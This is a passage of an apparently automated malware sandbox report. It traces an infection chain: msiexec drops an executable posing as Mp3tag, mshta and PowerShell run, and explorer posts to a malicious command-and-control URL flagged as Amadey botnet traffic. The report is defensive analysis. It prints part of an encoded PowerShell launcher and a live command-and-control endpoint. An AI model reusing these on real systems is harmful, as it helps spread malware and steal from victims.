GYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAKQAgAHsACgAgACAAIAAgACAAIAAgACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAuAEYAdQBsAGwATgBhAG0AZQAgAC0ATgBvAE4AZQB3AFcAaQBuAGQAbwB3ACAALQBXAGEAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACMAIABSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAIAAtAFIAZQBjAHUAcgBzAGUAIAAtAEYAbwByAGMAZQAKAH0ACgAKACYAIAAkAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgBmAGYAZgAgAD4AIAAkAG4AdQBsAGwAIAAyAD4AJgAxAAoA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5112 | "C:\Users\admin\AppData\Local\Temp\H9TNZ2UK9Z6ZKMWOTFB.exe" | C:\Users\admin\AppData\Local\Temp\H9TNZ2UK9Z6ZKMWOTFB.exe | msiexec.exe | ||||||||||||
User: admin Company: Florian Heidenreich Integrity Level: HIGH Description: Mp3tag - the universal Tag editor Exit code: 1 Version: 3.27.1.0 Modules
| |||||||||||||||
| 5316 | C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | C:\Windows\SysWOW64\dllhost.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5696 | C:\WINDOWS\SysWOW64\explorer.exe | C:\Windows\SysWOW64\explorer.exe | more.com | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Explorer Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
31 148
Read events
31 099
Write events
46
Delete events
3
Modification events
| (PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (7072) mshta.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (732) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached |
| Operation: | write | Name: | {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF |
Value: 01000000000000007F7849A27D46DB01 | |||
| (PID) Process: | (5316) dllhost.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
| Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 | |||
| (PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
| (PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableAutoFileTracing |
Value: 0 | |||
| (PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
| (PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | FileTracingMask |
Value: | |||
| (PID) Process: | (4816) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 |
| Operation: | write | Name: | ConsoleTracingMask |
Value: | |||
Executable files
63
Suspicious files
17
Text files
14
Unknown types
3
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlutv3sf.vbe.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6660 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:B514A092BF01B5C59571B1174B9157D4 | SHA256:23DC84178D5C3183B99D82DB925CFDAB0AA9215E9439462DAA1122377E18FB86 | |||
| 6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ll0wia.eby.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kjouub2m.c20.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5u02kfe5.mnq.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | binary | |
MD5:3797C2F10EC8518BF9EC09C46723C80A | SHA256:C3355740F5A8B7A4E5DAD742979FC1AF576ED42F39D94839224D0DCCAB1CD4E3 | |||
| 7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | der | |
MD5:971C514F84BBA0785F80AA1C23EDFD79 | SHA256:F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895 | |||
| 6172 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_urro1daj.1ex.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12 | der | |
MD5:67E486B2F148A3FCA863728242B6273E | SHA256:FACAF1C3A4BF232ABCE19A2D534E495B0D3ADC7DBE3797D336249AA6F70ADCFB | |||
| 7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | |
MD5:017F37A5585B8DCFDA34E5A6809903BC | SHA256:70E8B8B97C281FDA26C95D89E787E9DDC59E016F2751DC07B5790D206F396708 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
53
DNS requests
30
Threats
6
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
3416 | svchost.exe | GET | 200 | 184.24.77.37:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
3416 | svchost.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
7072 | mshta.exe | GET | 200 | 142.250.186.67:80 | http://c.pki.goog/r/r4.crl | unknown | — | — | whitelisted |
6500 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
7072 | mshta.exe | GET | 200 | 142.250.186.67:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
5696 | explorer.exe | POST | 200 | 104.21.26.41:80 | http://connect.resourcecloud.shop/pLQvfD4d5/index.php | unknown | — | — | malicious |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3416 | svchost.exe | 184.24.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3416 | svchost.exe | 69.192.161.161:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 92.123.104.17:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
DNS requests
Domain | IP | Reputation |
|---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
www.bing.com |
| whitelisted |
google.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
berb.fitnessclub-filmfanatics.com |
| unknown |
c.pki.goog |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
— | — | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
— | — | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |
4 ETPRO signatures available at the full report